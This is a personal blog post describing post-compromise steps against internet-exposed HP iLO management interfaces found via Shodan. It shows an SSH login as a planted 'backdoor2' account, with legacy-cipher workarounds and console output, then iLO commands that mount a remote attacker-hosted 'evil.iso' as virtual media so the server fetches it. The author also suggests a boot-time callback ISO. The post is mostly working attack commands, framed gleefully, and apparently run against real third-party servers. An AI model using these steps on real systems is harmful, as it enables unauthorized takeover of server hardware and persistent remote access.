Tuesday, February 18, 2025

IPMI exposure over the internet, IPMIPWN & post compromise activities.


Another stop along memory lane is my favored thing to boast about, IPMIPWN! :P

I thought I would dive back into Shodan and check out the status of the attack surface after all this time. As expected, still stocked with targets! So this time around I wanted to took a look beyond penetration and look at post compromise activity.

Its been a while since I first made IPMIPWN, so a few things have changed. The servers out there are so old that the ciphers used for ssh are no longer supported a modern desktop ssh clients by default, making my first ssh attempt post IPMIPWN hax0rin was much like the below:
ssh backdoor2@target.com
Unable to negotiate with target.com port 22: no matching key exchange method found. Their offer: diffie-hellman-group14-sha1,diffie-hellman-group1-sha1

Google said to added -o KexAlgorithms=diffie-hellman-group14-sha1, Then: 

ssh -o KexAlgorithms=diffie-hellman-group14-sha1 backdoor2@target.com

Unable to negotiate with target.com port 22: no matching host key type found. Their offer: ssh-dss

And then:

ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss backdoor2@target.com

Unable to negotiate with target.com port 22: no matching cipher found. Their offer: aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc

And then:

ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss -c aes256-cbc backdoor2@target.com

Unable to negotiate with target.com port 22: no matching MAC found. Their offer: hmac-sha1 

And then:

C:\Users\hacker> ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss -c aes256-cbc -m hmac-sha1 backdoor2@target.com

The authenticity of host 'target.com' can't be established.

DSA key fingerprint is SHA256:LkuLO3/0BBf4iCXIeOO/d9kjh987trtA30pZZkS/ruc.

This key is not known by any other names.

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

Warning: Permanently added 'target.com' (DSA) to the list of known hosts.

backdoor2@target.com's password:

User:backdoor2 logged-in to ILOBRC444.(target.com)

iLO 3 Standard 1.26 at  Aug 26 2011

Server Name: SER_EPAPAR

Server Power: On


</>hpiLO->

 

Ok, so IPMIPWN got us this far, what next? A few possible attack paths might involve virtual media (VM) functionality. Here is how that might be setup:

First, See what VM is loaded if any

 </>hpiLO-> show map1/oemhp_vm1/cddr1

 Set our own VM

</>hpiLO-> cd map1/oemhp_vm1/cddr1

</map1/oemhp_vm1/cddr1>hpiLO-> set oemhp_image=http://cracker/evil.iso

Enable our "attacker controlled" VM

 </>hpiLO-> set /map1/oemhp_vm1/cddr1 oemhp_boot=connect

Confirm our changes

 </map1/oemhp_vm1/cddr1>hpiLO-> show

I used webhook.site to confirm this attack with great successes, as soon as you set oemhp_boot to connect, you should start seeing connection requests. You could also make your own Kali ISO that has a script to connect to a server somewhere, run on boot or network connection confirmation. More attack paths later >:)


Enjoy the 1's and 0's.. 

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)